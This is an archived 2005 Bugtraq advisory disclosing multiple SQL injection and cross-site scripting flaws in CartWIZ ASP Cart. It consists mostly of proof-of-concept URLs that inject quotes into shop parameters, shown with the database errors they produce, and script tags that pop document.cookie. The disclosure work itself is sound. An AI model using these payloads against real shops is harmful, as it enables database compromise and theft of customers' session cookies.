lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 24 Apr 2005 01:26:56 -0000
From: dcrab <dcrab@...kerscenter.com>
To: bugtraq@...urityfocus.com
Subject: Multiple Sql injection and XSS in CartWIZ ASP Cart




Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah

Severity: High
Title: Multiple Sql injection and XSS in CartWIZ ASP Cart
Date: 23/04/2005

Vendor: CartWIZ
Vendor Website: http://www.cartwiz.com
Summary: There are, multiple sql injection and xss in cartwiz asp cart.

Proof of Concept Exploits: 

http://localhost/cartWiz/store/addToCart.asp?idProduct='SQL_INJECTION&quantity=1
SQL INJECTION

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string 'SQL_INJECTION'.

/cartWiz/store/addToCart.asp, line 86


http://localhost/cartwiz/store/productDetails.asp?idProduct='SQL%20INJECTION
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string 'SQL INJECTION'.

/cartwiz/store/productDetails.asp, line 34


http://localhost/cartwiz/store/searchResults.asp?name=&idCategory=&sku=&priceFrom=0&priceTo='SQL INJECTION&validate=1
SQL INJECTION

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near 'SQL'.

/cartwiz/store/searchResults.asp, line 102


http://localhost/cartwiz/store/searchResults.asp?name=&idCategory=&sku=&priceFrom='SQL INJECTION&priceTo=9999999999&validate=1
SQL INJECTION

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near 'SQL'.

/cartwiz/store/searchResults.asp, line 102


http://localhost/cartwiz/store/searchResults.asp?name=&idCategory='SQL INJECTION&sku=&priceFrom=0&priceTo=9999999999&validate=1
SQL INJECTION

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near ' or products.briefDescription LIKE '.

/cartwiz/store/searchResults.asp, line 102


http://localhost/cartwiz/store/tellAFriend.asp?idProduct='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;
XSS Pops Cookie


http://localhost/cartwiz/store/addToWishlist.asp?idProduct='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;
XSS Pops Cookie


http://localhost/cartwiz/store/access.asp?redirect='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;
XSS Pops Cookie


http://localhost/cartWiz/store/error.asp?message='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;
XSS Pops Cookie


http://localhost/cartwiz/store/login.asp?message=Please+login+using+the+form+above+to+access+your+account.&redirect='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;
XSS Pops Cookie


http://localhost/cartwiz/store/login.asp?message='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&redirect=
XSS Pops Cookie


http://localhost/cartwiz/store/searchResults.asp?name=&idCategory=&sku='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&priceFrom=0&priceTo=9999999999&validate=1
XSS Pops Cookie


http://localhost/cartwiz/store/searchResults.asp?name='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&idCategory=&sku=&priceFrom=0&priceTo=9999999999&validate=1
XSS Pops Cookie



http://localhost/cartwiz/store/productCatalogSubCats.asp?idParentCategory='SQL ERROR
SQL ERROR

Microsoft VBScript runtime  error '800a000d'

Type mismatch: '[string: "'SQL ERROR"]'

/cartwiz/store/productCatalogSubCats.asp, line 87



Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author: 
These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding with php.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ